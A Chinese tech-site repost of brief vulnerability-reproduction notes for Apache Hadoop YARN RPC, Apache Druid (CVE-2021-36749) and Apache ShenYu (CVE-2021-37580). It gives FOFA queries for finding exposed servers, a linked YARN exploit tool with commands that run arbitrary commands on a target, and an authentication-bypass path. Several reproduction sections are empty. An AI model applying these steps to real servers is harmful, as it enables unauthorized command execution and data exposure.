栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 前沿技术 > 大数据 > 大数据系统

一些Apache近期CVE复现姿势

一些Apache近期CVE复现姿势

Hadoop Yarn RPC 未授权访问漏洞

漏洞详情:

   Apache Hadoop YARN (Yet Another Resource Negotiator)是一种新的 Hadoop 资源管理器,它是一个通用资源管理系统,可为上层应用提供统一的资源管理和调度,它的引入为集群在利用率、资源统一管理和数据共享等方面带来了巨大好处。
HadoopYarn默认对外开放RPC服务,攻击者可利用RPC服务执行任意命令,进而控制服务器。同时由于Hadoop Yarn RPC服务访问控制机制开启方式与REST API不一样,因此即使在 REST API有授权认证的情况下,RPC服务所在端口仍然可以未授权访问。

影响版本:
全版本

FOFA语句:

app=“APACHE-hadoop-YARN”

工具下载:

https://github.com/cckuailong/YarnRpcRCE

工具使用:

java -jar YarnRpcUnauth.jar ip:port "ping dnslog"
java -jar YarnRpcUnauth.jar ip:port "touch /tmp/1"  
第二条适用于可以登录服务器查看
Apache Druid LoadData- 任意文件读取漏洞-CVE-2021-36749

漏洞详情:

由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。由于 Apache Druid 默认情况下是缺乏授权认证,攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。

影响版本:
Apache Druid Version < 0.22

FOFA语句:

title=“Apache Druid”

复现过程:



Apache ShenYu dashboardUser 身份验证绕过漏洞 CVE-2021-37580

漏洞详情:

Apache ShenYu(原名 Soul)是一个异步的、跨语言的、多协议的高性能响应式API 网关,并可应用于所有微服务场景。

2021年 11 月 16日,Apache发布安全公告,公开了Apache ShenYu中的一个身份验证绕过漏洞(CVE-2021-37580),该漏洞的CVSS评分为9.8。由于ShenyuAdminBootstrap中JWT的错误使用,导致攻击者可以绕过身份验证,直接进入目标系统后台。

影响版本:

Apache ShenYu 2.3.0
Apache ShenYu 2.4.0

FOFA语句:

body=“Soul网关”

Poc:

/dashboardUser

复现过程:

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/629501.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号